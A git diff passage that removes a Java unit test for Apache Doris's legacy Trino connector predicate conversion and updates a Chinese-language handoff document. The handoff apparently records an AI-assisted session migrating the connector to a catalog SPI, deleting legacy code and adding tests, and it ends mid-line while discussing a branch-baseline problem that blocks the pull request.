tupleDomain = trinoConnectorPredicateConverter.convertExprToTrinoTupleDomain( - expr); - testTupleDomain.add(tupleDomain); - } - - // verify if `testTupleDomain` is equal to `expectTupleDomain`. - for (int i = 0; i < expectTupleDomain.size(); i++) { - Assert.assertTrue(expectTupleDomain.get(i).contains(testTupleDomain.get(i))); - } - - // test <=> - SlotRef intSlot = new SlotRef(new TableNameInfo("test_table"), "c_int"); - NullLiteral nullLiteral = NullLiteral.create(Type.INT); - BinaryPredicate expr = new BinaryPredicate(Operator.EQ_FOR_NULL, intSlot, nullLiteral); - TupleDomain testNullTupleDomain = trinoConnectorPredicateConverter.convertExprToTrinoTupleDomain( - expr); - TupleDomain expectNullTupleDomain = TupleDomain.withColumnDomains( - ImmutableMap.of(trinoConnectorColumnHandleMap.get("c_int"), Domain.onlyNull(IntegerType.INTEGER))); - Assert.assertTrue(expectNullTupleDomain.contains(testNullTupleDomain)); - } - - @Test - public void testBinaryLessThanPredicate() throws AnalysisException { - // construct slotRefs and literalLists - List slotRefs = mockSlotRefs(); - List literalList = mockLiteralExpr(); - - // expect results - List> expectTupleDomain = Lists.newArrayList(); - ImmutableList expectRanges = new ImmutableList.Builder() - .add(Range.lessThan(trinoConnectorColumnMetadataMap.get("c_bool").getType(), true)) - .add(Range.lessThan(trinoConnectorColumnMetadataMap.get("c_tinyint").getType(), 1L)) - .add(Range.lessThan(trinoConnectorColumnMetadataMap.get("c_smallint").getType(), 1L)) - .add(Range.lessThan(trinoConnectorColumnMetadataMap.get("c_int").getType(), 1L)) - .add(Range.lessThan(trinoConnectorColumnMetadataMap.get("c_bigint").getType(), 1L)) - .add(Range.lessThan(trinoConnectorColumnMetadataMap.get("c_real").getType(), - Long.valueOf(Float.floatToIntBits(1.23f)))) - .add(Range.lessThan(trinoConnectorColumnMetadataMap.get("c_double").getType(), 3.1415926456)) - .add(Range.lessThan(trinoConnectorColumnMetadataMap.get("c_short_decimal").getType(), 12345623L)) - .add(Range.lessThan(trinoConnectorColumnMetadataMap.get("c_long_decimal").getType(), - Int128.valueOf(new BigInteger("12345678901234567890123123")))) - .add(Range.lessThan(trinoConnectorColumnMetadataMap.get("c_char").getType(), - Slices.utf8Slice("trino connector char test"))) - .add(Range.lessThan(trinoConnectorColumnMetadataMap.get("c_varchar").getType(), - Slices.utf8Slice("trino connector varchar test"))) - .add(Range.lessThan(trinoConnectorColumnMetadataMap.get("c_varbinary").getType(), - Slices.utf8Slice("trino connector varbinary test"))) - .add(Range.lessThan(trinoConnectorColumnMetadataMap.get("c_date").getType(), -1L)) - .add(Range.lessThan(trinoConnectorColumnMetadataMap.get("c_short_timestamp").getType(), - 1000001L)) - // .add(Range.lessThan(trinoConnectorColumnMetadataMap.get("c_short_timestamp_timezone").getType(), - // 0L)) - .add(Range.lessThan(trinoConnectorColumnMetadataMap.get("c_long_timestamp").getType(), - new LongTimestamp(1000001L, 0))) - .add(Range.lessThan(trinoConnectorColumnMetadataMap.get("c_long_timestamp_timezone").getType(), - LongTimestampWithTimeZone.fromEpochMillisAndFraction(1000L, 1000000, - TimeZoneKey.getTimeZoneKey("Asia/Shanghai")))) - .build(); - for (int i = 0; i < slotRefs.size(); i++) { - final String colName = slotRefs.get(i).getColumnName(); - Domain domain = Domain.create(ValueSet.ofRanges(Lists.newArrayList(expectRanges.get(i))), false); - TupleDomain tupleDomain = TupleDomain.withColumnDomains( - ImmutableMap.of(trinoConnectorColumnHandleMap.get(colName), domain)); - expectTupleDomain.add(tupleDomain); - } - - // test results, construct lessThan binary predicate - List> testTupleDomain = Lists.newArrayList(); - for (int i = 0; i < slotRefs.size(); i++) { - BinaryPredicate expr = new BinaryPredicate(Operator.LT, slotRefs.get(i), - literalList.get(i)); - TupleDomain tupleDomain = trinoConnectorPredicateConverter.convertExprToTrinoTupleDomain( - expr); - testTupleDomain.add(tupleDomain); - } - - // verify if `testTupleDomain` is equal to `expectTupleDomain`. - for (int i = 0; i < expectTupleDomain.size(); i++) { - Assert.assertTrue(expectTupleDomain.get(i).contains(testTupleDomain.get(i))); - } - } - - @Test - public void testBinaryLessEqualPredicate() throws AnalysisException { - // construct slotRefs and literalLists - List slotRefs = mockSlotRefs(); - List literalList = mockLiteralExpr(); - - // expect results - List> expectTupleDomain = Lists.newArrayList(); - ImmutableList expectRanges = new ImmutableList.Builder() - .add(Range.lessThanOrEqual(trinoConnectorColumnMetadataMap.get("c_bool").getType(), true)) - .add(Range.lessThanOrEqual(trinoConnectorColumnMetadataMap.get("c_tinyint").getType(), 1L)) - .add(Range.lessThanOrEqual(trinoConnectorColumnMetadataMap.get("c_smallint").getType(), 1L)) - .add(Range.lessThanOrEqual(trinoConnectorColumnMetadataMap.get("c_int").getType(), 1L)) - .add(Range.lessThanOrEqual(trinoConnectorColumnMetadataMap.get("c_bigint").getType(), 1L)) - .add(Range.lessThanOrEqual(trinoConnectorColumnMetadataMap.get("c_real").getType(), - Long.valueOf(Float.floatToIntBits(1.23f)))) - .add(Range.lessThanOrEqual(trinoConnectorColumnMetadataMap.get("c_double").getType(), 3.1415926456)) - .add(Range.lessThanOrEqual(trinoConnectorColumnMetadataMap.get("c_short_decimal").getType(), 12345623L)) - .add(Range.lessThanOrEqual(trinoConnectorColumnMetadataMap.get("c_long_decimal").getType(), - Int128.valueOf(new BigInteger("12345678901234567890123123")))) - .add(Range.lessThanOrEqual(trinoConnectorColumnMetadataMap.get("c_char").getType(), - Slices.utf8Slice("trino connector char test"))) - .add(Range.lessThanOrEqual(trinoConnectorColumnMetadataMap.get("c_varchar").getType(), - Slices.utf8Slice("trino connector varchar test"))) - .add(Range.lessThanOrEqual(trinoConnectorColumnMetadataMap.get("c_varbinary").getType(), - Slices.utf8Slice("trino connector varbinary test"))) - .add(Range.lessThanOrEqual(trinoConnectorColumnMetadataMap.get("c_date").getType(), -1L)) - .add(Range.lessThanOrEqual(trinoConnectorColumnMetadataMap.get("c_short_timestamp").getType(), - 1000001L)) - // .add(Range.lessThanOrEqual(trinoConnectorColumnMetadataMap.get("c_short_timestamp_timezone").getType(), - // 0L)) - .add(Range.lessThanOrEqual(trinoConnectorColumnMetadataMap.get("c_long_timestamp").getType(), - new LongTimestamp(1000001L, 0))) - .add(Range.lessThanOrEqual(trinoConnectorColumnMetadataMap.get("c_long_timestamp_timezone").getType(), - LongTimestampWithTimeZone.fromEpochMillisAndFraction(1000L, 1000000, - TimeZoneKey.getTimeZoneKey("Asia/Shanghai")))) - .build(); - for (int i = 0; i < slotRefs.size(); i++) { - final String colName = slotRefs.get(i).getColumnName(); - Domain domain = Domain.create(ValueSet.ofRanges(Lists.newArrayList(expectRanges.get(i))), false); - TupleDomain tupleDomain = TupleDomain.withColumnDomains( - ImmutableMap.of(trinoConnectorColumnHandleMap.get(colName), domain)); - expectTupleDomain.add(tupleDomain); - } - - // test results, construct lessThanOrEqual binary predicate - List> testTupleDomain = Lists.newArrayList(); - for (int i = 0; i < slotRefs.size(); i++) { - BinaryPredicate expr = new BinaryPredicate(Operator.LE, slotRefs.get(i), - literalList.get(i)); - TupleDomain tupleDomain = trinoConnectorPredicateConverter.convertExprToTrinoTupleDomain( - expr); - testTupleDomain.add(tupleDomain); - } - - // verify if `testTupleDomain` is equal to `expectTupleDomain`. - for (int i = 0; i < expectTupleDomain.size(); i++) { - Assert.assertTrue(expectTupleDomain.get(i).contains(testTupleDomain.get(i))); - } - } - - @Test - public void testBinaryGreatThanPredicate() throws AnalysisException { - // construct slotRefs and literalLists - List slotRefs = mockSlotRefs(); - List literalList = mockLiteralExpr(); - - // expect results - List> expectTupleDomain = Lists.newArrayList(); - ImmutableList expectRanges = new ImmutableList.Builder() - .add(Range.greaterThan(trinoConnectorColumnMetadataMap.get("c_bool").getType(), true)) - .add(Range.greaterThan(trinoConnectorColumnMetadataMap.get("c_tinyint").getType(), 1L)) - .add(Range.greaterThan(trinoConnectorColumnMetadataMap.get("c_smallint").getType(), 1L)) - .add(Range.greaterThan(trinoConnectorColumnMetadataMap.get("c_int").getType(), 1L)) - .add(Range.greaterThan(trinoConnectorColumnMetadataMap.get("c_bigint").getType(), 1L)) - .add(Range.greaterThan(trinoConnectorColumnMetadataMap.get("c_real").getType(), - Long.valueOf(Float.floatToIntBits(1.23f)))) - .add(Range.greaterThan(trinoConnectorColumnMetadataMap.get("c_double").getType(), 3.1415926456)) - .add(Range.greaterThan(trinoConnectorColumnMetadataMap.get("c_short_decimal").getType(), 12345623L)) - .add(Range.greaterThan(trinoConnectorColumnMetadataMap.get("c_long_decimal").getType(), - Int128.valueOf(new BigInteger("12345678901234567890123123")))) - .add(Range.greaterThan(trinoConnectorColumnMetadataMap.get("c_char").getType(), - Slices.utf8Slice("trino connector char test"))) - .add(Range.greaterThan(trinoConnectorColumnMetadataMap.get("c_varchar").getType(), - Slices.utf8Slice("trino connector varchar test"))) - .add(Range.greaterThan(trinoConnectorColumnMetadataMap.get("c_varbinary").getType(), - Slices.utf8Slice("trino connector varbinary test"))) - .add(Range.greaterThan(trinoConnectorColumnMetadataMap.get("c_date").getType(), -1L)) - .add(Range.greaterThan(trinoConnectorColumnMetadataMap.get("c_short_timestamp").getType(), - 1000001L)) - // .add(Range.greaterThan(trinoConnectorColumnMetadataMap.get("c_short_timestamp_timezone").getType(), - // 0L)) - .add(Range.greaterThan(trinoConnectorColumnMetadataMap.get("c_long_timestamp").getType(), - new LongTimestamp(1000001L, 0))) - .add(Range.greaterThan(trinoConnectorColumnMetadataMap.get("c_long_timestamp_timezone").getType(), - LongTimestampWithTimeZone.fromEpochMillisAndFraction(1000L, 1000000, - TimeZoneKey.getTimeZoneKey("Asia/Shanghai")))) - .build(); - for (int i = 0; i < slotRefs.size(); i++) { - final String colName = slotRefs.get(i).getColumnName(); - Domain domain = Domain.create(ValueSet.ofRanges(Lists.newArrayList(expectRanges.get(i))), false); - TupleDomain tupleDomain = TupleDomain.withColumnDomains( - ImmutableMap.of(trinoConnectorColumnHandleMap.get(colName), domain)); - expectTupleDomain.add(tupleDomain); - } - - // test results, construct greaterThan binary predicate - List> testTupleDomain = Lists.newArrayList(); - for (int i = 0; i < slotRefs.size(); i++) { - BinaryPredicate expr = new BinaryPredicate(Operator.GT, slotRefs.get(i), - literalList.get(i)); - TupleDomain tupleDomain = trinoConnectorPredicateConverter.convertExprToTrinoTupleDomain( - expr); - testTupleDomain.add(tupleDomain); - } - - // verify if `testTupleDomain` is equal to `expectTupleDomain`. - for (int i = 0; i < expectTupleDomain.size(); i++) { - Assert.assertTrue(expectTupleDomain.get(i).contains(testTupleDomain.get(i))); - } - } - - @Test - public void testBinaryGreaterEqualPredicate() throws AnalysisException { - // construct slotRefs and literalLists - List slotRefs = mockSlotRefs(); - List literalList = mockLiteralExpr(); - - // expect results - List> expectTupleDomain = Lists.newArrayList(); - ImmutableList expectRanges = new ImmutableList.Builder() - .add(Range.greaterThanOrEqual(trinoConnectorColumnMetadataMap.get("c_bool").getType(), true)) - .add(Range.greaterThanOrEqual(trinoConnectorColumnMetadataMap.get("c_tinyint").getType(), 1L)) - .add(Range.greaterThanOrEqual(trinoConnectorColumnMetadataMap.get("c_smallint").getType(), 1L)) - .add(Range.greaterThanOrEqual(trinoConnectorColumnMetadataMap.get("c_int").getType(), 1L)) - .add(Range.greaterThanOrEqual(trinoConnectorColumnMetadataMap.get("c_bigint").getType(), 1L)) - .add(Range.greaterThanOrEqual(trinoConnectorColumnMetadataMap.get("c_real").getType(), - Long.valueOf(Float.floatToIntBits(1.23f)))) - .add(Range.greaterThanOrEqual(trinoConnectorColumnMetadataMap.get("c_double").getType(), 3.1415926456)) - .add(Range.greaterThanOrEqual(trinoConnectorColumnMetadataMap.get("c_short_decimal").getType(), 12345623L)) - .add(Range.greaterThanOrEqual(trinoConnectorColumnMetadataMap.get("c_long_decimal").getType(), - Int128.valueOf(new BigInteger("12345678901234567890123123")))) - .add(Range.greaterThanOrEqual(trinoConnectorColumnMetadataMap.get("c_char").getType(), - Slices.utf8Slice("trino connector char test"))) - .add(Range.greaterThanOrEqual(trinoConnectorColumnMetadataMap.get("c_varchar").getType(), - Slices.utf8Slice("trino connector varchar test"))) - .add(Range.greaterThanOrEqual(trinoConnectorColumnMetadataMap.get("c_varbinary").getType(), - Slices.utf8Slice("trino connector varbinary test"))) - .add(Range.greaterThanOrEqual(trinoConnectorColumnMetadataMap.get("c_date").getType(), -1L)) - .add(Range.greaterThanOrEqual(trinoConnectorColumnMetadataMap.get("c_short_timestamp").getType(), - 1000001L)) - // .add(Range.greaterThanOrEqual(trinoConnectorColumnMetadataMap.get("c_short_timestamp_timezone").getType(), - // 0L)) - .add(Range.greaterThanOrEqual(trinoConnectorColumnMetadataMap.get("c_long_timestamp").getType(), - new LongTimestamp(1000001L, 0))) - .add(Range.greaterThanOrEqual(trinoConnectorColumnMetadataMap.get("c_long_timestamp_timezone").getType(), - LongTimestampWithTimeZone.fromEpochMillisAndFraction(1000L, 1000000, - TimeZoneKey.getTimeZoneKey("Asia/Shanghai")))) - .build(); - for (int i = 0; i < slotRefs.size(); i++) { - final String colName = slotRefs.get(i).getColumnName(); - Domain domain = Domain.create(ValueSet.ofRanges(Lists.newArrayList(expectRanges.get(i))), false); - TupleDomain tupleDomain = TupleDomain.withColumnDomains( - ImmutableMap.of(trinoConnectorColumnHandleMap.get(colName), domain)); - expectTupleDomain.add(tupleDomain); - } - - // test results, construct greaterThanOrEqual binary predicate - List> testTupleDomain = Lists.newArrayList(); - for (int i = 0; i < slotRefs.size(); i++) { - BinaryPredicate expr = new BinaryPredicate(Operator.GE, slotRefs.get(i), - literalList.get(i)); - TupleDomain tupleDomain = trinoConnectorPredicateConverter.convertExprToTrinoTupleDomain( - expr); - testTupleDomain.add(tupleDomain); - } - - // verify if `testTupleDomain` is equal to `expectTupleDomain`. - for (int i = 0; i < expectTupleDomain.size(); i++) { - Assert.assertTrue(expectTupleDomain.get(i).contains(testTupleDomain.get(i))); - } - } - - @Test - public void testInPredicate() throws AnalysisException { - // construct slotRefs and literalLists - List slotRefs = mockSlotRefs(); - List literalList = mockLiteralExpr(); - - // expect results - List> expectInTupleDomain = Lists.newArrayList(); - List> expectNotInTupleDomain = Lists.newArrayList(); - ImmutableList expectRanges = new ImmutableList.Builder() - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_bool").getType(), true)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_tinyint").getType(), 1L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_smallint").getType(), 1L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_int").getType(), 1L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_bigint").getType(), 1L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_real").getType(), - Long.valueOf(Float.floatToIntBits(1.23f)))) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_double").getType(), 3.1415926456)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_short_decimal").getType(), 12345623L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_long_decimal").getType(), - Int128.valueOf(new BigInteger("12345678901234567890123123")))) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_char").getType(), - Slices.utf8Slice("trino connector char test"))) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_varchar").getType(), - Slices.utf8Slice("trino connector varchar test"))) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_varbinary").getType(), - Slices.utf8Slice("trino connector varbinary test"))) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_date").getType(), -1L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_short_timestamp").getType(), - 1000001L)) - // .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_short_timestamp_timezone").getType(), - // 0L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_long_timestamp").getType(), - new LongTimestamp(1000001L, 0))) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_long_timestamp_timezone").getType(), - LongTimestampWithTimeZone.fromEpochMillisAndFraction(1000L, 1000000, - TimeZoneKey.getTimeZoneKey("Asia/Shanghai")))) - .build(); - - for (int i = 0; i < slotRefs.size(); i++) { - final String colName = slotRefs.get(i).getColumnName(); - Domain inDomain = Domain.create( - ValueSet.ofRanges(Lists.newArrayList(expectRanges.get(i))), false); - Domain notInDomain = Domain.create(ValueSet.all(trinoConnectorColumnMetadataMap.get(colName).getType()) - .subtract(ValueSet.ofRanges(expectRanges.get(i))), false); - TupleDomain inTupleDomain = TupleDomain.withColumnDomains( - ImmutableMap.of(trinoConnectorColumnHandleMap.get(colName), inDomain)); - TupleDomain notInTupleDomain = TupleDomain.withColumnDomains( - ImmutableMap.of(trinoConnectorColumnHandleMap.get(colName), notInDomain)); - expectInTupleDomain.add(inTupleDomain); - expectNotInTupleDomain.add(notInTupleDomain); - } - - // test results, construct equal binary predicate - List> testTupleDomain = Lists.newArrayList(); - for (int i = 0; i < slotRefs.size(); i++) { - InPredicate expr = new InPredicate(slotRefs.get(i), Lists.newArrayList(literalList.get(i)), false); - TupleDomain tupleDomain = trinoConnectorPredicateConverter.convertExprToTrinoTupleDomain( - expr); - testTupleDomain.add(tupleDomain); - } - // verify if `testTupleDomain` is equal to `expectTupleDomain`. - for (int i = 0; i < expectInTupleDomain.size(); i++) { - Assert.assertTrue(expectInTupleDomain.get(i).contains(testTupleDomain.get(i))); - } - - testTupleDomain.clear(); - for (int i = 0; i < slotRefs.size(); i++) { - InPredicate expr = new InPredicate(slotRefs.get(i), Lists.newArrayList(literalList.get(i)), true); - TupleDomain tupleDomain = trinoConnectorPredicateConverter.convertExprToTrinoTupleDomain( - expr); - testTupleDomain.add(tupleDomain); - } - // verify if `testTupleDomain` is equal to `expectTupleDomain`. - for (int i = 0; i < expectNotInTupleDomain.size(); i++) { - Assert.assertTrue(expectNotInTupleDomain.get(i).contains(testTupleDomain.get(i))); - } - } - - @Test - public void testCompoundPredicate() throws AnalysisException { - // construct slotRefs and literalLists - List slotRefs = mockSlotRefs(); - List literalList = mockLiteralExpr(); - - // valid expr - List validExprs = Lists.newArrayList(); - for (int i = 0; i < slotRefs.size(); i++) { - BinaryPredicate expr = new BinaryPredicate(BinaryPredicate.Operator.EQ, slotRefs.get(i), - literalList.get(i)); - validExprs.add(expr); - } - - // invalid expr - BinaryPredicate invalidExpr = new BinaryPredicate(BinaryPredicate.Operator.EQ, - literalList.get(0), literalList.get(0)); - - // AND - // valid AND valid - for (int i = 0; i < validExprs.size(); i++) { - for (int j = 0; j < validExprs.size(); j++) { - CompoundPredicate andPredicate = new CompoundPredicate(CompoundPredicate.Operator.AND, - validExprs.get(i), validExprs.get(j)); - trinoConnectorPredicateConverter.convertExprToTrinoTupleDomain(andPredicate); - } - } - - // valid AND invalid - CompoundPredicate andPredicate = new CompoundPredicate(CompoundPredicate.Operator.AND, - validExprs.get(0), invalidExpr); - trinoConnectorPredicateConverter.convertExprToTrinoTupleDomain(andPredicate); - - // invalid AND valid - andPredicate = new CompoundPredicate(CompoundPredicate.Operator.AND, invalidExpr, validExprs.get(0)); - trinoConnectorPredicateConverter.convertExprToTrinoTupleDomain(andPredicate); - - // invalid AND invalid - andPredicate = new CompoundPredicate(CompoundPredicate.Operator.AND, invalidExpr, invalidExpr); - try { - trinoConnectorPredicateConverter.convertExprToTrinoTupleDomain(andPredicate); - } catch (AnalysisException e) { - Assert.assertTrue(e.getMessage().contains("Can not convert both sides of compound predicate")); - } - - // OR - // valid OR valid - for (int i = 0; i < validExprs.size(); i++) { - for (int j = 0; j < validExprs.size(); j++) { - CompoundPredicate orPredicate = new CompoundPredicate(CompoundPredicate.Operator.OR, - validExprs.get(i), validExprs.get(j)); - trinoConnectorPredicateConverter.convertExprToTrinoTupleDomain(orPredicate); - } - } - - // // valid OR valid - try { - CompoundPredicate orPredicate = new CompoundPredicate(CompoundPredicate.Operator.AND, - validExprs.get(0), invalidExpr); - trinoConnectorPredicateConverter.convertExprToTrinoTupleDomain(orPredicate); - } catch (AnalysisException e) { - Assert.assertTrue(e.getMessage().contains("slotRef is null in binaryPredicateConverter")); - } - } - - private List mockSlotRefs() { - return new ImmutableList.Builder() - .add(new SlotRef(new TableNameInfo("test_table"), "c_bool")) - - .add(new SlotRef(new TableNameInfo("test_table"), "c_tinyint")) - .add(new SlotRef(new TableNameInfo("test_table"), "c_smallint")) - .add(new SlotRef(new TableNameInfo("test_table"), "c_int")) - .add(new SlotRef(new TableNameInfo("test_table"), "c_bigint")) - - .add(new SlotRef(new TableNameInfo("test_table"), "c_real")) - .add(new SlotRef(new TableNameInfo("test_table"), "c_double")) - - .add(new SlotRef(new TableNameInfo("test_table"), "c_short_decimal")) - .add(new SlotRef(new TableNameInfo("test_table"), "c_long_decimal")) - - .add(new SlotRef(new TableNameInfo("test_table"), "c_char")) - .add(new SlotRef(new TableNameInfo("test_table"), "c_varchar")) - .add(new SlotRef(new TableNameInfo("test_table"), "c_varbinary")) - - .add(new SlotRef(new TableNameInfo("test_table"), "c_date")) - .add(new SlotRef(new TableNameInfo("test_table"), "c_short_timestamp")) - // .add(new SlotRef(new TableName("test_table"), "c_short_timestamp_timezone")) - .add(new SlotRef(new TableNameInfo("test_table"), "c_long_timestamp")) - .add(new SlotRef(new TableNameInfo("test_table"), "c_long_timestamp_timezone")) - .build(); - } - - private List mockLiteralExpr() throws AnalysisException { - return new ImmutableList.Builder() - // boolean - .add(new BoolLiteral(true)) - // Integer - .add(new IntLiteral(1, Type.TINYINT)) - .add(new IntLiteral(1, Type.SMALLINT)) - .add(new IntLiteral(1, Type.INT)) - .add(new IntLiteral(1, Type.BIGINT)) - - .add(new FloatLiteral(1.23, Type.FLOAT)) // Real type - .add(new FloatLiteral(3.1415926456, Type.DOUBLE)) - - .add(new DecimalLiteral(new BigDecimal("123456.23"), ScalarType.createDecimalV3Type(8, 2))) - .add(new DecimalLiteral(new BigDecimal("12345678901234567890123.123"), ScalarType.createDecimalV3Type(26, 3))) - - .add(new StringLiteral("trino connector char test")) - .add(new StringLiteral("trino connector varchar test")) - .add(new StringLiteral("trino connector varbinary test")) - - .add(new DateLiteral(1969, 12, 31, Type.DATEV2)) - .add(new DateLiteral(1970, 1, 1, 0, 0, 1, 1, Type.DATETIMEV2)) - // .add(new DateLiteral(1970, 1, 1, 0, 0, 0, 0, Type.DATETIMEV2)) - .add(new DateLiteral(1970, 1, 1, 0, 0, 1, 1, Type.DATETIMEV2)) - .add(new DateLiteral(1970, 1, 1, 8, 0, 1, 1, Type.DATETIMEV2)) - .build(); - } - - private static class MockColumnHandle implements ColumnHandle { - private String colName; - - MockColumnHandle(String colName) { - this.colName = colName; - } - - @Override - public boolean equals(Object o) { - if (this == o) { - return true; - } - if (o == null || getClass() != o.getClass()) { - return false; - } - MockColumnHandle that = (MockColumnHandle) o; - return colName.equals(that.colName); - } - - @Override - public int hashCode() { - return Objects.hash(colName); - } - } -} diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index cdc3c4f7b74233..52adf21f2567ef 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -8,175 +8,130 @@ ## 📅 最后一次 handoff -- **日期 / 时间**:2026-05-25(白天 ④) -- **本 session 主导者**:Claude Opus 4.7(1M context) -- **本 session 主题**:**P1 阶段关闭**(批 B = T1 推迟到 P8;in-scope 100% 完成) -- **预估 context 使用**:~25%(健康;本场无编码,主要是 recon + 用户决议 + 跟踪文档同步) +- **日期 / 时间**:2026-06-04 +- **本 session 主题**:**P2 批 C+D+E 连续完成**(T07 翻闸 → T08-T10 删 legacy → T11 单测 → T13 文档),**T12 推迟**,**PR 待开**(分支基线对齐由用户处理) +- **分支**:`catalog-spi-03` --- ## ✅ 本 session 完成项 -### 1. 批 B (T1) recon — 揭示 callers 非 dead code +> 注:用户本 session 开始前把 `catalog-spi-03` **rebase 到了新 master**,所有旧 commit hash 已变。下方为 rebase 后的新 hash。 -启动批 B 前对 `Jdbc*Client.java` + `JdbcFieldSchema.java` 的 fe-core 引用做了 Explore subagent 调研。结论: +### 批 C — T07 翻闸(commit `0fe4b8a93d6`) -| Caller(路径) | Live? | 用途 | -|---|---|---| -| `job/extensions/insert/streaming/PostgresResourceValidator.java` | ✅ 活 | CREATE JOB 时校验 PG 复制槽 / 发布;被 StreamingJobUtils → StreamingInsertJob → CreateJobCommand 链调用 | -| `job/util/StreamingJobUtils.java` | ✅ 活 | `getJdbcClient()` + `getPrimaryKeys`/`getColumnsFromJdbc`/`getTablesNameList`,CDC 表枚举 + DDL 生成 | -| `tablefunction/CdcStreamTableValuedFunction.java` | ✅ 活 | `cdc_stream` TVF,被 `CdcStream.java:46` 调,streaming 作业执行链路 | +`CatalogFactory.java:53` `SPI_READY_TYPES` 加 `"trino-connector"`(顺手删上方注释里过时的 trino 列举)。这一步把 `CREATE CATALOG type='trino-connector'` 路由到 SPI(`PluginDrivenExternalCatalog`),关闭了批 B→批 C 的 regression window。compile + checkstyle 绿。 -测试侧:`StreamingJobUtilsTest`(需重写);`JdbcFieldSchemaTest` / `JdbcClickHouseClientTest` / `JdbcClientExceptionTest`(测 legacy 本身,随源删除)。 +### 批 D — 删 fe-core legacy trino 代码(commit `ed81a063fe8`,14 文件 / +1 −2508) -fe-connector 侧 SPI 替换 `Jdbc*ConnectorClient`(ClickHouse/DB2/MySQL/Oracle/PostgreSQL/SQLServer/SapHana/Gbase)已就位,但 **fe-core 不能直接 import** —— 会破坏 `tools/check-connector-imports.sh` 守门。 +- **T08** `PhysicalPlanTranslator`:删 `instanceof TrinoConnectorExternalTable` scan 分支 + 2 import(`PluginDrivenExternalTable` SPI 前置分支接管)。 +- **T09** `CatalogFactory`:删 `case "trino-connector"` + import。 +- **T10**:删 `datasource/trinoconnector/` 整目录(10 文件)+ 删 legacy 测试 `TrinoConnectorPredicateTest`。 +- **DV-001(HANDOFF 原计划漏项,recon 补回)**:`ExternalCatalog.java:948` `case TRINO_CONNECTOR` 改返 `PluginDrivenExternalDatabase`(照搬已迁移的 JDBC case,line 936)+ 删 import。 +- **有意保留**:`MetastoreProperties.Type.TRINO_CONNECTOR` + `TrinoConnectorPropertiesFactory`(属性子系统,不引用被删目录,SPI 路径可能仍需);`InitCatalogLog.Type.TRINO_CONNECTOR` + `TableType.TRINO_CONNECTOR_EXTERNAL_TABLE` 枚举(image compat);`GsonUtils` 3 个 label redirect(批 B 已处理,T10 **不碰** GsonUtils)。 +- 守门:fe-core `clean test-compile`(main+test)BUILD SUCCESS、checkstyle 0、fe-connector import-gate SUCCESS。 -### 2. 用户决议(Q4):推迟 T1 到 P8 收尾 +### 批 E — T11 单测(commit `9bba12a44b2`,3 文件 / +441) -- 删 T1 需要在 `ConnectorPlugin`/`ConnectorMetadata` 上为 CDC use case 暴露 `getPrimaryKeys` / `getColumnsFromJdbc` / `listTables` 新 capability — 是 SPI 扩展工作,超出 Master Plan §3.2 P1 scope -- 现状无 runtime 风险——legacy JDBC client 仍在原位,CDC 功能正常 -- 决策:T1 推迟到 P8 收尾,与 streaming CDC 重构一起做(避免 P1 阶段引入 1-2 天计划外 SPI 设计) +3 个 JUnit5(Jupiter)纯转换器测试,**29 测试全绿**,checkstyle 0,本地 `mvn -pl fe-connector/fe-connector-trino -am test` 可跑: +- `TrinoPredicateConverterTest`(14)— `ConnectorExpression` pushdown → Trino `TupleDomain`(EQ/range/NE/IN/NOT IN/IS [NOT] NULL/AND/OR、Slice 编码、null/unsupported 优雅降级到 `all()`)。 +- `TrinoTypeMappingTest`(11)— Trino type → Doris `ConnectorType`(标量、decimal 精度/scale、timestamp 精度 clamp 到 6、array/map/struct、unknown 抛错)。 +- `TrinoConnectorProviderTest`(4)— `validateProperties` 缺/空 `trino.connector.name` fail-fast(批 A T01)。 +- **DV-002**:fe-connector-trino 无 Mockito、`TrinoJsonSerializer` 非纯单元(需 plugin 的 HandleResolver+TypeRegistry)→ 砍 json/schema,用 `validateProperties` 替补第 3 类;plugin 依赖路径由现有 `external_table_p0/p2` trino_connector regression 套件覆盖。 -P1 状态因此提前关闭:**in-scope (T3+T4+T5) 100% 完成;T1 推迟 P8;T2 推迟 P4/P5**。 +### T13 — 跟踪文档同步(本次提交) -### 3. 跟踪文档同步 - -- `tasks/P1-scan-node-cleanup.md`:元信息状态翻 ✅;验收标准重新对齐(标 🚫/[x]/🟡);任务表 T1 翻 🚫 + 备注引用 Q4;新增 白天 ④ 阶段日志条目;当前阻塞项更新 -- `PROGRESS.md`:header 项目总进度 16% → 20%;§一 P1 → 100% ✅;§一 P2 → 🚧 准备启动;全局进度 8% → 12%;§三 P1 表 header 改 "✅ 已完成",T1 行翻 🚫;§四加 白天 ④ 条目;§七 session 状态更新 -- `HANDOFF.md`(本文件):覆盖更新到 P1 阶段关闭状态 +PROGRESS / tasks/P2 / connectors/trino-connector.md / deviations-log(DV-001..004)/ 本 HANDOFF 全部翻到 P2 完成态。 --- -## 🚧 本 session 进行中 / 未完成 - -无编码工作。剩余动作: +## 🚧 未完成 / 待办 -1. **commit 本场 plan-doc 改动** — 3 个文件(P1 task / PROGRESS / HANDOFF) -2. **push `catalog-spi-02` 到 morningman fork**(**待用户授权**)— 含批 A commit `43a12a05ffe` + 本场 doc commit -3. **`gh pr create --repo apache/doris --base branch-catalog-spi --head morningman:catalog-spi-02`**(**待用户授权**) +1. **PR 未开 —— 阻塞于分支基线错位(用户处理)**。`catalog-spi-03` 现基于**新 master**(含 `#63823 split fe-sql-parser`、`#64016 TLS` 等 master-only commit),而远端 `apache/doris:branch-catalog-spi` 仍停在 P1 merge `778c5dd610f`(旧 master 基线);两者分叉于 `68d4eb308e5`(#63552)。`git rev-list --count 